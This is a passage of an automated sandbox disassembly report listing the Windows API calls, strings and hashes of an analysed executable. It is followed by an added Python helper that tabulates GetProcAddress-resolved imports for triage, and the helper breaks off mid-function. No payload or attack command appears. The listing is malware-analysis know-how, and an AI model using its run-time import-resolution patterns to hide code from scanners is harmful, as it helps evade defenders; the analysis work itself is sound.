                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                            • String ID: ,$?
                                                                            • API String ID: 2359071979-2308483597
                                                                            • Opcode ID: a4330348a8b5add72bb88b34234a092f9c4bcb0268f2a71967034c917c80e18f
                                                                            • Instruction ID: 4e4ae47f8a98248c410fe7f22b452c6d5eef6af5e50a3601a7d5a52227d6b5a7
                                                                            • Opcode Fuzzy Hash: a4330348a8b5add72bb88b34234a092f9c4bcb0268f2a71967034c917c80e18f
                                                                            • Instruction Fuzzy Hash: 91510774A00141ABDB10EF6ADC816DA7BF9AF09304B1585BBF904E73A6D738DE41CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BE98
                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BEA7
                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BEF8
                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF06
                                                                            • DeleteObject.GDI32(?), ref: 0041BF0F
                                                                            • DeleteObject.GDI32(?), ref: 0041BF18
                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BF35
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                            • String ID:
                                                                            • API String ID: 1030595962-0
                                                                            • Opcode ID: def8fbccf1c24a02d994da4c86886dac4c2dead876cc1f6ae6625c60910ee1ab
                                                                            • Instruction ID: df24cebc7fa487ee98114de19092ccc5a22b1f53c044ef6357ba81a281e40f4e
                                                                            • Opcode Fuzzy Hash: def8fbccf1c24a02d994da4c86886dac4c2dead876cc1f6ae6625c60910ee1ab
                                                                            • Instruction Fuzzy Hash: A4510571E00219AFCB14DFA9D8819EEB7F9EF48314B10446AF914E7391D738AD81CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CE6E
                                                                            • 73A14620.GDI32(00000000,00000026), ref: 0041CE8D
                                                                            • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CEF3
                                                                            • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF02
                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CF6C
                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041CFAA
                                                                            • 73A08830.GDI32(?,?,00000001,0041CFDC,00000000,00000026), ref: 0041CFCF
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Stretch$A08830$A022A14620BitsMode
                                                                            • String ID:
                                                                            • API String ID: 2733548868-0
                                                                            • Opcode ID: f1e44e616a31fadfa248c6df7b1b8cee01c2aa03eac239bf1acaf6848e72f817
                                                                            • Instruction ID: 0295d75a013be80ecc2d975aeb153abe1d20fbb24d7cab5e263b7fb8805ed029
                                                                            • Opcode Fuzzy Hash: f1e44e616a31fadfa248c6df7b1b8cee01c2aa03eac239bf1acaf6848e72f817
                                                                            • Instruction Fuzzy Hash: 6A512970644600AFDB14DFA8C985FABBBF9AF08304F10459AF544DB292C778ED80CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,?,?), ref: 004551E2
                                                                              • Part of subcall function 004241EC: GetWindowTextA.USER32(?,?,00000100), ref: 0042420C
                                                                              • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                              • Part of subcall function 0041EE14: 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                              • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00455249
                                                                            • TranslateMessage.USER32(?), ref: 00455267
                                                                            • DispatchMessageA.USER32(?), ref: 00455270
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                            • String ID: [Paused]
                                                                            • API String ID: 1715372110-4230553315
                                                                            • Opcode ID: c756cc2506f3dbf4f4bb9941ae66d94f60b4aee530b10c6c59ca1a5cc46b1d7b
                                                                            • Instruction ID: f2f6b487c86353f72898e4c8af60e590ce20add486516cec5e8e630063df4c80
                                                                            • Opcode Fuzzy Hash: c756cc2506f3dbf4f4bb9941ae66d94f60b4aee530b10c6c59ca1a5cc46b1d7b
                                                                            • Instruction Fuzzy Hash: 5731C3319086486ECB01DBB5DC51FEEBBB8EB49314F5140B7F800E3692D67C990ACB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCursor.USER32(00000000,0046731B), ref: 00467298
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004672A6
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046731B), ref: 004672AC
                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046731B), ref: 004672B6
                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046731B), ref: 004672BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LoadSleep
                                                                            • String ID: CheckPassword
                                                                            • API String ID: 4023313301-1302249611
                                                                            • Opcode ID: 7853287eaffac6cb94d744d74196ba731cdf5e518dc0597f07a7724a604def1d
                                                                            • Instruction ID: e79c91264cf403656a7ecb179e9d02605dd9e3cded0af3c011d04f8f5d04b07e
                                                                            • Opcode Fuzzy Hash: 7853287eaffac6cb94d744d74196ba731cdf5e518dc0597f07a7724a604def1d
                                                                            • Instruction Fuzzy Hash: A1318134644644AFD711EF69C88AF9A7BE4AF45308F5580B6FC00AF3A2DB789D40DB49
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00457B93
                                                                            Strings
                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00457B9E
                                                                            • CreateAssemblyCache, xrefs: 00457B8A
                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00457BB6
                                                                            • Fusion.dll, xrefs: 00457B33
                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00457B78
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                            • API String ID: 190572456-3990135632
                                                                            • Opcode ID: 84556e50aacdd0334a8723a64b5ce391b8f5f4a0f005a9f218f2c1a3e260840a
                                                                            • Instruction ID: 54d6081f599df52c860fdc2f47534742524e01ae44f48fc011e119f3f1d07f73
                                                                            • Opcode Fuzzy Hash: 84556e50aacdd0334a8723a64b5ce391b8f5f4a0f005a9f218f2c1a3e260840a
                                                                            • Instruction Fuzzy Hash: FA319A71E04609AFCB11EFA5D88169FB7B8EF44315F50857BE814E7382D7389E088B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0041BFB8: GetObjectA.GDI32(?,00000018), ref: 0041BFC5
                                                                            • GetFocus.USER32 ref: 0041C0D8
                                                                            • 73A0A570.USER32(?), ref: 0041C0E4
                                                                            • 73A08830.GDI32(?,?,00000000,00000000,0041C163,?,?), ref: 0041C105
                                                                            • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C163,?,?), ref: 0041C111
                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C128
                                                                            • 73A08830.GDI32(?,00000000,00000000,0041C16A,?,?), ref: 0041C150
                                                                            • 73A0A480.USER32(?,?,0041C16A,?,?), ref: 0041C15D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A08830$A022A480A570BitsFocusObject
                                                                            • String ID:
                                                                            • API String ID: 1424713005-0
                                                                            • Opcode ID: 4dda706c4d7f92d041f49e6fbb3e4bdf95359f21a4b7263d3cbf0515cfc8cf41
                                                                            • Instruction ID: be6d8328aec04e85a436dd0cf8ae2147a44d9b66c6d411dca3268b31211d8f12
                                                                            • Opcode Fuzzy Hash: 4dda706c4d7f92d041f49e6fbb3e4bdf95359f21a4b7263d3cbf0515cfc8cf41
                                                                            • Instruction Fuzzy Hash: B2116A71A40618BFDB10DBA9CC86FAFB7FCEF48700F54446AB514E7281D6789D008B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0047DF38), ref: 0047DF1D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                            • API String ID: 47109696-2530820420
                                                                            • Opcode ID: 3d421fe5b9d66a13501841859f0a8451f50d73c39307a227430f230348f08d3b
                                                                            • Instruction ID: 7da821122e4f9b7c3381c3a81ebb3182cabfb864ff3682cb6973b5219dc9143e
                                                                            • Opcode Fuzzy Hash: 3d421fe5b9d66a13501841859f0a8451f50d73c39307a227430f230348f08d3b
                                                                            • Instruction Fuzzy Hash: 65118E30B24204AADB01DB66C802BDF7BB9EF15318F61C0B7F406E7286EB79D9018758
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                            • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                            • DeleteDC.GDI32(?), ref: 0041B449
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                            • String ID:
                                                                            • API String ID: 1458357782-0
                                                                            • Opcode ID: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                            • Instruction ID: 073f11bba2386bee955988a390c3df6f0cbda7ed7a331810ab0cae2060ca734e
                                                                            • Opcode Fuzzy Hash: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                            • Instruction Fuzzy Hash: F9114C72E40659ABDF10D6D9D985FAFB3BCEF08704F048456B614FB242C678A8418B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,?,00000000), ref: 0048F451
                                                                              • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0048F473
                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0048F9C9), ref: 0048F487
                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 0048F4A9
                                                                            • 73A0A480.USER32(00000000,00000000,0048F4D3,0048F4CC,?,00000000,?,?,00000000), ref: 0048F4C6
                                                                            Strings
                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0048F47E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                            • API String ID: 1435929781-222967699
                                                                            • Opcode ID: aec2ce94ca0a2fe66ea55faeebd29ac8e829e062f1f7dec7e9667981b672f2ca
                                                                            • Instruction ID: 36afa4b657b34b8522d1c231de5a8c505386f3c2143f3af581d88b388b6b6632
                                                                            • Opcode Fuzzy Hash: aec2ce94ca0a2fe66ea55faeebd29ac8e829e062f1f7dec7e9667981b672f2ca
                                                                            • Instruction Fuzzy Hash: BF016575A04608BFEB01EAA5CC41F6FB7ECDB49704F514477B604E7281D6789D008B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 0042331F
                                                                            • WindowFromPoint.USER32(?,?), ref: 0042332C
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042333A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00423341
                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 0042335A
                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423371
                                                                            • SetCursor.USER32(00000000), ref: 00423383
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                            • String ID:
                                                                            • API String ID: 1770779139-0
                                                                            • Opcode ID: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                            • Instruction ID: 4e500bdd1cb7c406dcecfc45487f359b17b305850d12e3c552a5b3a09f906ed3
                                                                            • Opcode Fuzzy Hash: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                            • Instruction Fuzzy Hash: EC01D4223043103AD620BB795C86E3F26A8CFC5B55F50417FB909BE283DA3D8D0163AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0048F274
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0048F281
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0048F28E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                            • API String ID: 667068680-2254406584
                                                                            • Opcode ID: 1e6e599f15a85ca3434ac6dc2256e25d95c130a7a50b60adec5cf6b1919fb023
                                                                            • Instruction ID: 320adb3965b6f495dc5cbca51cbfa6a5691965cf1facb545b0a128d01ebcbff3
                                                                            • Opcode Fuzzy Hash: 1e6e599f15a85ca3434ac6dc2256e25d95c130a7a50b60adec5cf6b1919fb023
                                                                            • Instruction Fuzzy Hash: FBF0CDAAB41B1566D62072B60C82B7F618CCB81770F1408B7BD04A62C2EDAA8D0943BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00455EE0
                                                                            • GetExitCodeProcess.KERNEL32(?,^%I), ref: 00455F01
                                                                            • CloseHandle.KERNEL32(?,00455F34,?,?,OgE,00000000,00000000), ref: 00455F27
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects$^%I
                                                                            • API String ID: 2573145106-2465217090
                                                                            • Opcode ID: eae7e9bc5b852605da3e4c9cab9726f535817d301444d626726a3ca8f125a080
                                                                            • Instruction ID: 06bcc0b7b5ae778b55f830a6e63720fcc7028796f4e4f28f42062f96750590e8
                                                                            • Opcode Fuzzy Hash: eae7e9bc5b852605da3e4c9cab9726f535817d301444d626726a3ca8f125a080
                                                                            • Instruction Fuzzy Hash: 3401A271600604AFDB10EB99CC22E2E73A8EB49715F504177F810DB7D3DA3C9D04DA18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompressInit), ref: 0045B9B5
                                                                            • GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompress), ref: 0045B9C5
                                                                            • GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompressEnd), ref: 0045B9D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                            • API String ID: 190572456-212574377
                                                                            • Opcode ID: 622227cba5b86ca8fccab1400ad34dc8923e22f3f5578f85d6d1e5fdf3acff14
                                                                            • Instruction ID: bb37bbad0c8d10f251c0aa8c4ec345e64f50a4bb6c8e2d07f97ee2e6ad287d5c
                                                                            • Opcode Fuzzy Hash: 622227cba5b86ca8fccab1400ad34dc8923e22f3f5578f85d6d1e5fdf3acff14
                                                                            • Instruction Fuzzy Hash: A0F012B1600745DEEB14DF77EC41B2626A9E7E8326F14803BD8065936AE37C080ADE5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E91D), ref: 0044C07F
                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C090
                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C0A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                            • API String ID: 2238633743-1050967733
                                                                            • Opcode ID: b2562950c71cd23530e2a56bc8551780a47537d70dbbb9d9fb25e2bb869be04b
                                                                            • Instruction ID: ac0d725b3ee157e0591d3c5333f5e4ccdb9c4df60658dd2baa23885d1ab8f8cf
                                                                            • Opcode Fuzzy Hash: b2562950c71cd23530e2a56bc8551780a47537d70dbbb9d9fb25e2bb869be04b
                                                                            • Instruction Fuzzy Hash: 82F01270142389CBFBA0EBF5EDC9F123294D3A170DF18517BA0019A2E2C7BD4445CA0D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
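Several of the function entries above (Fusion.dll/CreateAssemblyCache, the BZ2_bzDecompress* trio, oleacc.dll/LresultFromObject, user32.dll/MonitorFromRect) share one pattern: the import is resolved at run time through GetProcAddress rather than appearing in the import table, which is what the "Extensive use of GetProcAddress" signature is reacting to. The script below is an added triage helper, not part of this report and not Joe Sandbox code: it parses "APIs"/"Strings" bullets in the layout shown here (the bullet format is assumed from this page, not from any documented export format) and collapses them into one table of ref address, DLL and requested symbol. The sample input is constructed from lines copied from the entries above. It also flags argument lists the sandbox reconstructed from the stack unreliably, as in the ChangeWindowMessageFilter entry further down, where the DLL name sits in the symbol position and the real symbol name only shows up among the GetModuleHandleA arguments.

```python
"""Triage helper: pull dynamically resolved imports out of a Joe Sandbox
function listing so the GetProcAddress targets can be reviewed as one table
instead of one entry at a time. Added example, not part of the report."""
import re
from collections import defaultdict

# Constructed sample input: "APIs"/"Strings" bullets copied from the function
# entries in this report, blank-line separated as they are rendered above.
SAMPLE_REPORT = """\
APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00457B93
Strings
• CreateAssemblyCache, xrefs: 00457B8A
• Fusion.dll, xrefs: 00457B33
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompressInit), ref: 0045B9B5
• GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompress), ref: 0045B9C5
• GetProcAddress.KERNEL32(022E0000,BZ2_bzDecompressEnd), ref: 0045B9D5
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044E91D), ref: 0044C07F
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C090
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C0A0
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0048F274
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0048F281
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0048F28E
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0048FAFA,QueryCancelAutoPlay,004929A3), ref: 0042E76A
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
• ChangeWindowMessageFilter.USER32(0000C1B5,00000001), ref: 0042E792
Uniqueness Score: -1.00%
"""

# One API bullet: <api>.<module>(<args>), ref: <addr>. The argument list is
# optional because some bullets have none (e.g. "GetFocus.USER32 ref: ...").
CALL_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
# Any DLL name in the entry, whether it came from a LoadLibraryA/GetModuleHandleA
# argument or only from the "Strings" list (the Fusion.dll entry names it there).
DLL_RE = re.compile(r"[\w-]+\.dll", re.IGNORECASE)


def split_entries(report_text):
    """Function entries are separated by blank (or whitespace-only) lines."""
    return [e for e in re.split(r"\n[ \t]*\n", report_text) if e.strip()]


def extract_dynamic_imports(report_text):
    """One record per GetProcAddress call: ref address, the DLL the entry names
    (None if it names none), the requested symbol, and a 'suspect' flag for
    argument lists the sandbox evidently reconstructed from stale stack slots."""
    records = []
    for entry in split_entries(report_text):
        dlls = DLL_RE.findall(entry)
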